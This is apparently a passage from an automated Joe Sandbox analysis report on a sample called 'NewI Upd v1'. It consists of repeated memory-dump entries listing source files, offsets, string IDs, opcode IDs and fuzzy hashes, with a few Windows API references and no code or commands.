                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: wvut$wvut
                                                                                  • API String ID: 0-2715987819
                                                                                  • Opcode ID: 5d152ac7f58ca66de897dd2323dda275e0eea79a11dde98410abd149c215d385
                                                                                  • Instruction ID: 91ba81a365acf588eb161e0c31f7b49f183479047e77c4367a1d3feac9479522
                                                                                  • Opcode Fuzzy Hash: 5d152ac7f58ca66de897dd2323dda275e0eea79a11dde98410abd149c215d385
                                                                                  • Instruction Fuzzy Hash: BB912575E00265CFDB148FA8EC816AEB7B0FB4A304F16007AD545AB391DB389D42CB99
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$d
                                                                                  • API String ID: 0-211900117
                                                                                  • Opcode ID: 402653c375be057a24b8ddc8e645a559e9dd7c3eefc18441dc9f98842947dbeb
                                                                                  • Instruction ID: b59294d9c1a15fa909a05ffb8caf6bf8d31ea6564f3e8878637a277ecda5345c
                                                                                  • Opcode Fuzzy Hash: 402653c375be057a24b8ddc8e645a559e9dd7c3eefc18441dc9f98842947dbeb
                                                                                  • Instruction Fuzzy Hash: A8713E7060C3A18BD718CF3A9061337BBD09F97314F68495EE4D69B382D679C50ACB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$d
                                                                                  • API String ID: 0-211900117
                                                                                  • Opcode ID: fd8e58c38395d7707d589fcef5b3f70413f735475b088cd4b8b72dde630ee84f
                                                                                  • Instruction ID: 870c4b68d944e8b6be36c511a114e621168382bd5957720ace9513f1f3ecc1aa
                                                                                  • Opcode Fuzzy Hash: fd8e58c38395d7707d589fcef5b3f70413f735475b088cd4b8b72dde630ee84f
                                                                                  • Instruction Fuzzy Hash: 3571607060C3A18BD718CF399061337BBD09F97314F68495EE4D69B382D679C90ACB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: `$d
                                                                                  • API String ID: 0-211900117
                                                                                  • Opcode ID: 235015f4e5ef938169629bcf23e5b61c92dd813a814395d21ce06f3e0bfc5011
                                                                                  • Instruction ID: 22cc976c6e4e1f58d6992f61751e0bf2ac1064a9de32c25a95527ca197daca6d
                                                                                  • Opcode Fuzzy Hash: 235015f4e5ef938169629bcf23e5b61c92dd813a814395d21ce06f3e0bfc5011
                                                                                  • Instruction Fuzzy Hash: FA51397060C3A18BD318CF3A9060377BBD19F97314F68499EE4D65B282D678890ACB5A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 6K%E$s7m
                                                                                  • API String ID: 0-818221315
                                                                                  • Opcode ID: e357db905aa0807865a35f0e2cbf2d9d71dd9cb62c18211750eed3ff664054f7
                                                                                  • Instruction ID: 10a9034e3de6b88d1c8796159a6682f4b5e4724ed6008898e1fa256ed9b2554c
                                                                                  • Opcode Fuzzy Hash: e357db905aa0807865a35f0e2cbf2d9d71dd9cb62c18211750eed3ff664054f7
                                                                                  • Instruction Fuzzy Hash: C8412876A087548FE310CF65AC8175FFBB2EBC5704F15893DE9C4AB385DAB488018B86
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: U1b3
                                                                                  • API String ID: 0-270911256
                                                                                  • Opcode ID: cb51c93c03e5505ab779ec242187b890a5dc6f62ccdaab6256764171c4962d4a
                                                                                  • Instruction ID: 1f59270be91c0502b57aaff0ae66bcab994d532a83e2253d9ab2ce2eeae932f7
                                                                                  • Opcode Fuzzy Hash: cb51c93c03e5505ab779ec242187b890a5dc6f62ccdaab6256764171c4962d4a
                                                                                  • Instruction Fuzzy Hash: F5221376A083528BC3148F29C8912ABB7F2FFC5314F19956EE8C997351EB388942C745
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: wvut
                                                                                  • API String ID: 0-2196794189
                                                                                  • Opcode ID: 9c9d8a6b287a7178b3d2d396fe97bc9716ec4effa8d724a6278157c9a8b29e2e
                                                                                  • Instruction ID: 9fc4db61dbacd35461e95bd8a68a7c56547a6397adc25f4a6770617cd9e7a88a
                                                                                  • Opcode Fuzzy Hash: 9c9d8a6b287a7178b3d2d396fe97bc9716ec4effa8d724a6278157c9a8b29e2e
                                                                                  • Instruction Fuzzy Hash: 1BB17AB17043206BDB14AF24999277BB3E1EF81314F59892EE8C597381E7BCD905839A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: .
                                                                                  • API String ID: 0-248832578
                                                                                  • Opcode ID: b44aaa4b881b229a7fb320e730a7cbc669038d8b7bdfd7c1b8fe6b8aab6ac102
                                                                                  • Instruction ID: ce53fe65cca3c19cc09fcc557d5b770b3a12b5b40f923682317799c05f835429
                                                                                  • Opcode Fuzzy Hash: b44aaa4b881b229a7fb320e730a7cbc669038d8b7bdfd7c1b8fe6b8aab6ac102
                                                                                  • Instruction Fuzzy Hash: F8D1F33A214615CBCB189F38EC5126B73F1FF4A751F4A88BDD4818B2A0EBB9C964C715
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: "
                                                                                  • API String ID: 0-123907689
                                                                                  • Opcode ID: 57d48448680f6229ba304471105e4fd2e8bbbe3056bff01ca0045dcf8bc26b0a
                                                                                  • Instruction ID: c763060bf1145a606778638d8daebe5b324e4591cdb452345f9319ca4427d103
                                                                                  • Opcode Fuzzy Hash: 57d48448680f6229ba304471105e4fd2e8bbbe3056bff01ca0045dcf8bc26b0a
                                                                                  • Instruction Fuzzy Hash: CAD1F372B083259FC714CE14A49076BB7EAEF84314F58892EE8998B382D738DD4587D6
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: jjQ?
                                                                                  • API String ID: 0-626640805
                                                                                  • Opcode ID: 8d909663dab21130efde3760dc3b767eb412b354a4a6913206843a32d4700e0a
                                                                                  • Instruction ID: b03a6a7432eeb08f4f6dbddbb241025ce9f96bfc6c407e1e5b3ac363557740b9
                                                                                  • Opcode Fuzzy Hash: 8d909663dab21130efde3760dc3b767eb412b354a4a6913206843a32d4700e0a
                                                                                  • Instruction Fuzzy Hash: 08B147B2604310ABD724DF20DD92B67B3A1FFC5314F14892DE98597381E7B8E905C79A
                                                                                  APIs
                                                                                  • GetSystemInfo.KERNEL32(?,4903A6BA), ref: 00886996
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InfoSystem
                                                                                  • String ID:
                                                                                  • API String ID: 31276548-0
                                                                                  • Opcode ID: 78e1b695c1c5eefbbc5e4d3acb78ae026f12cf05ea3cdf2d0dbe4a65494ca8a3
                                                                                  • Instruction ID: 354129c4806bdf6609e9900282e0fbcd1c4648b8113f9a62a12083d5a2dd40ba
                                                                                  • Opcode Fuzzy Hash: 78e1b695c1c5eefbbc5e4d3acb78ae026f12cf05ea3cdf2d0dbe4a65494ca8a3
                                                                                  • Instruction Fuzzy Hash: D231AC75D0426CDFCB04DFA8C880AEEBBB1FB49310F20826AD419B7741E7396941CBA4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: wvut
                                                                                  • API String ID: 2994545307-2196794189
                                                                                  • Opcode ID: 342f00f407c141f6e7a288519e8bc9032623d786883e271897790d5da8d631ae
                                                                                  • Instruction ID: fde0ab6a6a59c5feb220254cdff88481c1e42ddcaa36880b32455d244f373506
                                                                                  • Opcode Fuzzy Hash: 342f00f407c141f6e7a288519e8bc9032623d786883e271897790d5da8d631ae
                                                                                  • Instruction Fuzzy Hash: 3A91DF75A042019FC719DF28C891A2BB3E2AFDD720F15957EE8898B365DB34DC06CB46
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: fo`a
                                                                                  • API String ID: 2994545307-600490423
                                                                                  • Opcode ID: dc6b3311c9b6c7c7a9829328e82e53ced41db2e21b129a76fbec0d6fe261c598
                                                                                  • Instruction ID: cda554d51f78bfb7330dc5b45b63d80ab2477f6ca349c01ff6a3bf47399cd916
                                                                                  • Opcode Fuzzy Hash: dc6b3311c9b6c7c7a9829328e82e53ced41db2e21b129a76fbec0d6fe261c598
                                                                                  • Instruction Fuzzy Hash: D9A1F076A083259BCB249E28C89066BB3E2FFCC310F19953DE98587355D778AC05D785
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ffoh
                                                                                  • API String ID: 0-3529465427
                                                                                  • Opcode ID: 13e24c1ed09359ebf6273ba0177daf4f219596c24aa65b5e5558d3a58e05237f
                                                                                  • Instruction ID: 794e73f487c3847271e7422f81669b9b1b00bbcaf88f8760afd34f6f75263fa8
                                                                                  • Opcode Fuzzy Hash: 13e24c1ed09359ebf6273ba0177daf4f219596c24aa65b5e5558d3a58e05237f
                                                                                  • Instruction Fuzzy Hash: D5716EA450D3E29BD7324736A4A17B7BFD09FA3345F28098DE4D60B382E775090AC796
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: ~
                                                                                  • API String ID: 0-1707062198
                                                                                  • Opcode ID: 5361fbc9caad842370639a8333fac6ad2438af9cff0eb2d1440dcaa6c36820f6
                                                                                  • Instruction ID: 1c436f71a3a8cde90baa731bcdf8f75363321e76a6468630c5e6506317c9730c
                                                                                  • Opcode Fuzzy Hash: 5361fbc9caad842370639a8333fac6ad2438af9cff0eb2d1440dcaa6c36820f6
                                                                                  • Instruction Fuzzy Hash: 05A10972A082215FCB11CE28C84129BBBD1AF95324F19863EE8A9C73D2D778D946D7C5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: U
                                                                                  • API String ID: 0-3372436214
                                                                                  • Opcode ID: cb041b8c4387250bd8b05eb5f53de375d17192a074c7be7876a50ddc16f46950
                                                                                  • Instruction ID: a22d85fcfd3ebb894e767beea9bab91247ecbb9a3524fe20347f92de4ce0d1b5
                                                                                  • Opcode Fuzzy Hash: cb041b8c4387250bd8b05eb5f53de375d17192a074c7be7876a50ddc16f46950
                                                                                  • Instruction Fuzzy Hash: 26910737B59A804BD328893D4C123EB7A834BD6330F2DC77EA9B58B3E5D96988454345
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: U
                                                                                  • API String ID: 0-3372436214
                                                                                  • Opcode ID: 0d135ab1f1259071adc8bf91d02c0235560879e4f52d5f420c2b9ae5a574f7c3
                                                                                  • Instruction ID: 0d75165518db6c030528d5889de9a2c7a73d9c214497812ccdec65adedd39f39
                                                                                  • Opcode Fuzzy Hash: 0d135ab1f1259071adc8bf91d02c0235560879e4f52d5f420c2b9ae5a574f7c3
                                                                                  • Instruction Fuzzy Hash: BB811727749AD00BD3288D3C4C612AA7A934BDA330F2DD77EA5F18B3E5D9AD48064345
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: wvut
                                                                                  • API String ID: 0-2196794189
                                                                                  • Opcode ID: 7cd1ee3031f3755bcf0cc77e98212dd383b61ac154102b85976292f9be4fcc0e
                                                                                  • Instruction ID: 88146b9a55b37298dc01e35668b496685686cbb3fccf2a47d5b57e9cab182034
                                                                                  • Opcode Fuzzy Hash: 7cd1ee3031f3755bcf0cc77e98212dd383b61ac154102b85976292f9be4fcc0e
                                                                                  • Instruction Fuzzy Hash: 53714779A01211CFDB20CFA8DC416ABB7B1FF8A314F19416DD584AB3A1D7789C01CB49
                                                                                  APIs
                                                                                  • SetUnhandledExceptionFilter.KERNEL32(0087DB80,?,0087CD08), ref: 0087DB78
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179197662.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179182206.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179362694.00000000008AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179382474.00000000008BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179400184.00000000008C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179416887.00000000008C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_630000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                  • String ID:
                                                                                  • API String ID: 3192549508-0
                                                                                  • Opcode ID: 2b55d5a20041e16482c50df389fb16f833b5038dc779683c1f98a9bd8c723162
                                                                                  • Instruction ID: 61a86a003eb6e26e47837b417855be9b39fd7a3ccf6b37e0f4692d57db810ee7
                                                                                  • Opcode Fuzzy Hash: 2b55d5a20041e16482c50df389fb16f833b5038dc779683c1f98a9bd8c723162
                                                                                  • Instruction Fuzzy Hash: AAA0223028030CE3820023C2BC0A882BBECF802BB23008020F20C80A030B82A00000EA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: wvut
                                                                                  • API String ID: 2994545307-2196794189
                                                                                  • Opcode ID: 3b5054641af0fceb52603f9085f144d06d16b515ef2d04f4490ca8e6986df80e
                                                                                  • Instruction ID: d1e52be8b834acd533db16a4d6f36ebe122bd4857dbc4d46798b5727b717fd8c
                                                                                  • Opcode Fuzzy Hash: 3b5054641af0fceb52603f9085f144d06d16b515ef2d04f4490ca8e6986df80e
                                                                                  • Instruction Fuzzy Hash: DD516974A05300AFD768AF18888167BB762FBD6318F25562DC48217365C375DC43CB8E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_NewI Upd v1.jbxd
                                                                                  Similarity
                                                                                  • API ID: InitializeThunk
                                                                                  • String ID: wvut
                                                                                  • API String ID: 2994545307-2196794189
                                                                                  • Opcode ID: 0d7d2ef725fdd133e4b8ca060ca01e4e203c1330e749bc525c119ffb9a848578
                                                                                  • Instruction ID: 96f523632ba75ff9f18a3fd7ad0526c5b941d282bf75a97f01533bb0d88cdc5f
                                                                                  • Opcode Fuzzy Hash: 0d7d2ef725fdd133e4b8ca060ca01e4e203c1330e749bc525c119ffb9a848578
                                                                                  • Instruction Fuzzy Hash: 6C21043C608350DBDB588B18D8516BBB766FB8A328F61172DC08A17352D339DC52CB8E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.3179095834.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.3179078735.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179129410.0000000000441000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179144789.0000000000444000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.3179165216.0000000000452000.00000002.00001000.00020000.00000000.sdmpDownload File
